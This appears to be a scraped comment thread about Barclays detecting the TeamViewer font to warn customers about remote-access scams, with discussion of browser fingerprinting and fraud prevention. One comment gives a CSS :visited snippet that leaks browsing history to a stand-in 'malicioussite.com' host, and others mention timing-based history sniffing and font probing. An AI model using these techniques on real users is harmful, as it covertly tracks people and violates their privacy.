Barclays using TeamViewer font to warn customers
old.reddit.com
old.reddit.com
Browser people quickly realized the intrusive potential of this "feature" and disabled getting the visited status of a link.
Since browsers don't allow websites to detect the link colour, we can just trick the user into telling it for us.
After posting that, I got some emails from others, and someone shared a cool technique involving detecting how long it takes to paint the link to the screen. https://ndev.tk/visted/
It detected HN and other sites.
Disabling javascript saves the day again?
EDIT: https://developer.mozilla.org/en-US/docs/Web/CSS/Privacy_and...
a[href="https://foouniversity.edu/bookstore/"]:visited::after {
content: url(https://malicioussite.com/fingerprintme.png?wentto=foouniversity);
}
The user's browser will handily automatically send a request to the site, logging their visit on your end.Not 100% sure if browsers block this (they probably can, or otherwise definitely should!) via cross-origin policies or whatever, but if you control the site that the links are on then you can set the cross-origin policy yourself, without any need of a hidden iframe or similar things that are 'obviously scary' to safety-conscious Chromium browsers.
This isn't just something I made up either:
Still on the fence whether the creepiness is worth it, though. Seems like there are easier alternatives like "graylisting" where a transaction is in a pending state for 2-3 days where it's cancellable (and maybe can be expedited with a phone call). Seems like that'd offer a nice middle-ground between scanning your computer and protecting from scammers.
Banks should be on the offense against fraud by default.
As one of their customers, I think their password policies are extremely unhelpful to creating secure logons, and make it almost impossible to use a password manager.
If you work forwards from "wow, fonts are a weird fingerprint technique" it seems clever.
But the reality is it's much more straightforward if you just work it backwards. Someone said: we have access to the customer's browser, what can we grab to throw into our ML model? You look in the DOM spec, grab every piece of data you can get from the customer's system and send it all. Fonts is one thing that ended up being useful.
(I am not condoning this practice, just happen to be aware of it very well.)
So there is a lot of incentives to detect hacked clients.
> Companies that routinely deal with remote access scams (I'm thinking especially of crypto exchanges) could check for this font and display specific warnings only to people who had TeamViewer installed on their Windows machine (probably disproportionately represented among scam victims).
> TeamViewer is a long way from the only software being used for this, but it's kind of a cool opportunity.
EDIT: yes they are
I can imagine a font rendering a glyph as a line of code. But under the hood it would still be just a byte or bytes corresponding to that codepoint.
[0] https://www.trendmicro.com/vinfo/us/security/news/vulnerabil...
Could be some form of incredibly sticky authentication, unless the user removes the font will never go away. Nefarious and not sure there would ever be a legitimate usecase but sounds doable.
They can? I looked into this once - I was putting together a demo site for a friend who does graphic design (like physical signs) and he had a lot of unusual fonts installed on his computer that he would have liked to use from the website. He wanted a dynamic drop-down of all installed fonts so he could select the one to use in the demo, but as far as I could tell, Javascript doesn't allow that specifically because it could lead to browser fingerprinting/security problems.
document.fonts.check()
and it will tell you if it's on that system. For instance, try: console.log(document.fonts.check("12pt Apple Color Emoji"));In the past two weeks I have been locked out of an online banking portal with team viewer being one of the signals used to try to verify a suspicious looking transaction.
Team viewer used to install a font, but that doesn't seem to be how they identify that anymore.
Now hackers will uninstall this font.